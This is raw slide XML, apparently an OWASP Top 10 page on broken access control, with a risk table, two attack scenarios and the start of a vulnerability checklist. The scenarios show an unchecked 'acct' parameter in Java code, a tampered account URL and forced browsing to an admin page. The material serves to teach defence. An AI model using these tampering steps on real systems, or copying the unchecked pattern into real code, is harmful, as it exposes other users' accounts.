                    </a:solidFill>
                  </a:rPr>
                  <a:t>Agents</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="58" name="AutoShape 142"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5923128" y="1073877"/>
                <a:ext cx="762000" cy="381000"/>
              </a:xfrm>
              <a:prstGeom prst="foldedCorner">
                <a:avLst>
                  <a:gd name="adj" fmla="val 125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t"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Business</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Impacts</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="59" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="53" idx="4"/>
                <a:endCxn id="58" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5486400" y="1263956"/>
                <a:ext cx="436728" cy="421"/>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1" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2879480" y="1091049"/>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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Rectangle 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2861647" y="1235639"/>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3" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>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dirty="0" smtClean="0"/>
              <a:t>A3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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 name="Table 104"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="655611499"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="952281"/>
          <a:ext cx="6858000" cy="2528988"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
              </a:tblGrid>
              <a:tr h="641107">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r>
              <a:tr h="39415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rPr>
                        <a:t>Application</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="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1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Exploitability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>EASY</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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Prevalence</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>WIDESPREAD</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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Detectability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>EASY</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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Impact</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MODERATE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Application / Business</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</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491641">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>Consider</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t> the types of authorized users of your system. Are users restricted to certain functions and data? Are unauthenticated users allowed access to any functionality or data?</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Attackers,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> who are authorized users, simply change a parameter value to another resource they aren’t authorized for. Is access to this functionality or data granted?</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="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nSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>For</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> data, applications and APIs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> frequently</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> use the actual name or key of an object when generating web pages. For functions, URLs and function names are frequently easy to guess. Applications and APIs don’t always verify the user is authorized for the target resource. This results in an access control flaw. Testers can easily manipulate parameters to detect such flaws. Code analysis quickly shows whether authorization is correct.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="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a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Such flaws can compromise all the functionality or data that is accessible. Unless references are unpredictable,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> or access control is enforced, data and functionality can be stolen, or abused.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Consider the business value of the exposed data and functionality</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Also consider the business impact of public exposure of the vulnerability.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="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07" name="Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="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Example Attack Scenario</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>application uses unverified data in a SQL call that is accessing account information:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pstmt.setString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>( 1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("acct"));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  ResultSet results = pstmt.executeQuery( );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>An attacker simply modifies the ‘acct’ parameter in the browser to send whatever account number they want. If not properly verified, the attacker can access any user’s account.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/app/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>accountInfo?acct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>notmyacct</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: An attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>simply force browses to target URLs. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rights are also required for access to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/app/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>getappInfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/app/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin_getappInfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If an unauthenticated user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>access either page, i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>t’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a flaw. If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a non-admin can access the admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>page, this is also a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>flaw.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="35814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Am I Vulnerable?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="300" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The best way to find out if an application is vulnerable to access control vulnerabilities is to verify that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> data and function references have appropriate defenses. To determine if you are vulnerable, consider:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> references, does the application ensure the user is authorized by using a reference map or access control check to ensure the user is authorized for that data?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
